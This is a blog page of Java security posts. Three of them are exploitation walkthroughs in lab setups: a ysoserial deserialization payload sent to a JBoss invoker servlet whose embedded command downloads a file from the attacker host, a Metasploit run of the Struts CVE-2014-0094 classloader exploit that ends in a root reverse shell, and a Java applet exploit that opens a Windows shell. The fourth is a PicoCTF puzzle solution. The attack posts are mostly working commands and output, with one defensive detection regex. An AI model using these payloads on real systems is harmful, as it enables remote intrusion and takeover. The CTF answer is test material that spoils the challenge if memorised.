Showing posts with label java. Show all posts
Showing posts with label java. Show all posts

# Unserialize rce vulnerability in Java


Server - 192.168.1.1
# wget -O jboss-4.2.3.zip http://sourceforge.net/projects/jboss/files/JBoss/JBoss-4.2.3.GA/jboss-4.2.3.GA-jdk6.zip/download
# unzip jboss-4.2.3.zip
# mv jboss-4.2.3.GA /usr/local/share/jboss
# adduser appserver
# chown -R appserver /usr/local/share/jboss
# su -l appserver
$ cd /usr/local/share/jboss/bin
$ ./run.sh -b 0.0.0.0

Client - 192.168.1.2
# wget https://github.com/frohoff/ysoserial/releases/download/v0.0.2/ysoserial-0.0.2-all.jar
# java -jar ysoserial-0.0.2-all.jar CommonsCollections1 'wget -O /tmp/rshell http://192.168.1.2/rshell' > /tmp/payload
# curl --header 'Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue' --data-binary '@/tmp/payload' http://192.168.1.1:8080/invoker/JMXInvokerServlet

References

http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
Posted by t0n1 0 comments
Labels: , , ,

# CVE-2014-0094: Apache Struts ClassLoader manipulation RCE


Testbed

# wget http://mirrors.ibiblio.org/apache/tomcat/tomcat-8/v8.0.18/bin/apache-tomcat-8.0.18.tar.gz
# tar xvzf apache-tomcat-8.0.18.tar.gz
# mv apache-tomcat-8.0.18 /opt/tomcat
# cat /etc/environment
PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games"
export JAVA_HOME=/usr/lib/jvm/java-7-openjdk-amd64
export CATALINA_HOME=/opt/tomcat
# source /etc/environment
# grep -v -E "^(<\!| |-|$)" /opt/tomcat/conf/tomcat-users.xml
<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
# $CATALINA_HOME/bin/startup.sh
Using CATALINA_BASE:   /opt/tomcat
Using CATALINA_HOME:   /opt/tomcat
Using CATALINA_TMPDIR: /opt/tomcat/temp
Using JRE_HOME:        /usr/lib/jvm/java-7-openjdk-amd64
Using CLASSPATH:       /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar
Tomcat started.
# wget http://archive.apache.org/dist/struts/binaries/struts-2.3.16-all.zip
# unzip struts-2.3.16-all.zip
# find struts-2.3.16 | grep '\.war'
struts-2.3.16/apps/struts2-portlet.war
struts-2.3.16/apps/struts2-blank.war
struts-2.3.16/apps/struts2-rest-showcase.war
struts-2.3.16/apps/struts2-mailreader.war
struts-2.3.16/apps/struts2-showcase.war
# ! From http://10.0.0.2:8080/manager/html deploy struts2-blank.war
# tail -f /opt/tomcat/logs/*

Exploitation

msf > search cve-2014-0094

Matching Modules
================

   Name                                             Disclosure Date  Rank    Description
   ----                                             ---------------  ----    -----------
   exploit/multi/http/struts_code_exec_classloader  2014-03-06       manual  Apache Struts ClassLoader Manipulation Remote Code Execution

msf > use exploit/multi/http/struts_code_exec_classloader
msf exploit(struts_code_exec_classloader) > set rhost 10.0.0.2
msf exploit(struts_code_exec_classloader) > set lhost 10.0.0.1
msf exploit(struts_code_exec_classloader) > set target 0
msf exploit(struts_code_exec_classloader) > show options

Module options (exploit/multi/http/struts_code_exec_classloader):

   Name            Current Setting                           Required  Description
   ----            ---------------                           --------  -----------
   Proxies                                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           10.0.0.2                                  yes       The target address
   RPORT           8080                                      yes       The target port
   SMB_DELAY       10                                        yes       Time that the SMB Server will wait for the payload request
   SRVHOST         0.0.0.0                                   yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         445                                       yes       The local port to listen on.
   STRUTS_VERSION  2.x                                       yes       Apache Struts Framework version (accepted: 1.x, 2.x)
   TARGETURI       /struts2-blank/example/HelloWorld.action  yes       The path to a struts application action
   VHOST                                                     no        HTTP server virtual host


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.0.1         yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java

msf exploit(struts_code_exec_classloader) > exploit

[*] Started reverse handler on 10.0.0.1:4444 
[*] 10.0.0.2:8080 - Modifying Class Loader...
[*] 10.0.0.2:8080 - Waiting for the server to flush the logfile
[+] 10.0.0.2:8080 - Log file flushed at http://10.0.0.2:8080/vi8294.jsp
[!] This exploit requires manual cleanup of 'vi8294.jsp' on the target
[*] 10.0.0.2:8080 - Generating JSP...
[*] 10.0.0.2:8080 - Dumping JSP into the logfile...
[*] 10.0.0.2:8080 - Waiting for the server to flush the logfile
[+] 10.0.0.2:8080 - Log file flushed at http://10.0.0.2:8080/vi8294.jsp
[*] Command shell session 2 opened (10.0.0.1:4444 -> 10.0.0.2:5555)

whoami
root

Defense: payload and signature

GET /struts2-blank/example/HelloWorld.action?
class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT&
class['classLoader'].resources.context.parent.pipeline.first.prefix=0Ucn&
class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp&
class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=4 HTTP/1.1

Signature name = Apache Struts ClassLoader manipulation
part = "class", rgxp = "(.*\.|^|.*|\[('|\"))(c|C)lass(\.|('|\")\]|\[).*"
Search in : Parameters
Protocols : http, https

References

http://www.slideshare.net/testpurposes/deep-inside-the-java-framework-apache-struts
http://www.rapid7.com/db/modules/exploit/multi/http/struts_code_exec_classloader
Posted by t0n1 0 comments
Labels: , , , , ,

# PicoCTF 2k13 - Evergreen 


$ decompile('HexGame.class')
private long[] serializedState() {
 long s[] = new long[4];
 int bit = 0;
 Hexagon ahexagon[][];
 int j = (ahexagon = board).length;
 for(int i = 0; i < j; i++) {
  Hexagon row[] = ahexagon[i];
  Hexagon ahexagon1[];
  int l = (ahexagon1 = row).length;
  for(int k = 0; k < l; k++) {
   Hexagon hex = ahexagon1[k];
   if(hex != null) {
    if(hex.team == 0)
     s[(bit + 1) / 64] |= 1L << (bit + 1) % 64;
    else if(hex.team == 1)
     s[bit / 64] |= 1L << bit % 64; bit += 2;
   }
  }
 }
 return s;
}
private string stateString() {
 string s = "";
 Hexagon ahexagon[][];
 int j = (ahexagon = board).length;
 for(int i = 0; i < j; i++) {
  Hexagon row[] = ahexagon[i];
  Hexagon ahexagon1[];
  int l = (ahexagon1 = row).length;
  for(int k = 0; k < l; k++) {
   Hexagon hex = ahexagon1[k];
   if(hex != null)
    if(hex.team == 0)
     s = (new StringBuilder(string.valueOf(s))).append("1").toString();
    else if(hex.team == 1)
     s = (new StringBuilder(string.valueOf(s))).append("2").toString();
    else
     s = (new StringBuilder(string.valueOf(s))).append("0").toString();
  }
 }
 return s;
}
public void update() {
 Hexagon ahexagon[][];
 int j = (ahexagon = board).length;
 for(int i = 0; i < j; i++) {
  Hexagon row[] = ahexagon[i];
  Hexagon ahexagon1[];
  int l = (ahexagon1 = row).length;
  for(int k = 0; k < l; k++) {
   Hexagon hex = ahexagon1[k];
   if(hex != null && wasCaptured(hex) && hex.team != -1)
    handleCaptured(hex);
  }
 }
 if(justCaptured && !draft.alwaysPlaceAfterCapture)
  justCaptured = rand.nextBoolean();
 if(draft.hasLimitedPieces() && numPieces[currTeam] <= 0)
  justCaptured = false;
 long s[] = serializedState();
 if(s[0] == 0x60a0495842121146L && s[1] == 0x8024120912018061L && s[2] == 0x8824421240220921L && s[3] == 0x1211880604501801L) {
  system.out.println("Success! Your key is on the next line.");
  system.out.println(stateString());
 }
}
$ cat evergreen.py
#!/usr/bin/python

def init(num):
 num = bin(num)[2:]
 i = len(num)
 while i < 64:
  num = '0' + num
  i += 1
 return num

def reverse(num):
 if num == '10':
  return '1'
 elif num == '01':
  return '2'
 else:
  return '0'

s0 = init(0x60a0495842121146L)
s1 = init(0x8024120912018061L)
s2 = init(0x8824421240220921L)
s3 = init(0x1211880604501801L)

s = s3 + s2 + s1 + s0
l = len(s)
result = ''

for i in xrange(0,l-2,2):
 result += reverse(s[l-2-i] + s[l-1-i])

print result
$ ./evergreen.py
1202202010201002012221020011001220120001200010202100102002100001201021001010000210201002021001012000012000220200120001012020102
Posted by t0n1 0 comments
Labels: , , , ,

# Exploiting Java 0day

Introduction

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-4681

Metasploit

# msfconsole

msf > use exploit/multi/browser/java_jre17_exec
msf  exploit(java_jre17_exec) > set payload java/shell/reverse_tcp
msf  exploit(java_jre17_exec) > set srvhost 192.168.0.2
msf  exploit(java_jre17_exec) > set lhost 192.168.0.2
msf  exploit(java_jre17_exec) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.2:4444 
msf  exploit(java_jre17_exec) > [*] Using URL: http://192.168.0.2:8080/UxFhxobmVYzm
[*] Server started.
[*] 192.168.0.1      java_jre17_exec - Java 7 Applet Remote Code Execution handling request
[*] 192.168.0.1      java_jre17_exec - Sending Applet.jar
[*] 192.168.0.1      java_jre17_exec - Sending Applet.jar
[*] 192.168.0.1      java_jre17_exec - Sending Applet.jar
[*] Sending stage (2976 bytes) to 192.168.0.1
[*] Command shell session 1 opened (192.168.0.2:4444 -> 192.168.0.1:1139)

msf  exploit(java_jre17_exec) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\User\Desktop>
Posted by t0n1 0 comments
Labels: , , ,
Subscribe to: Posts (Atom)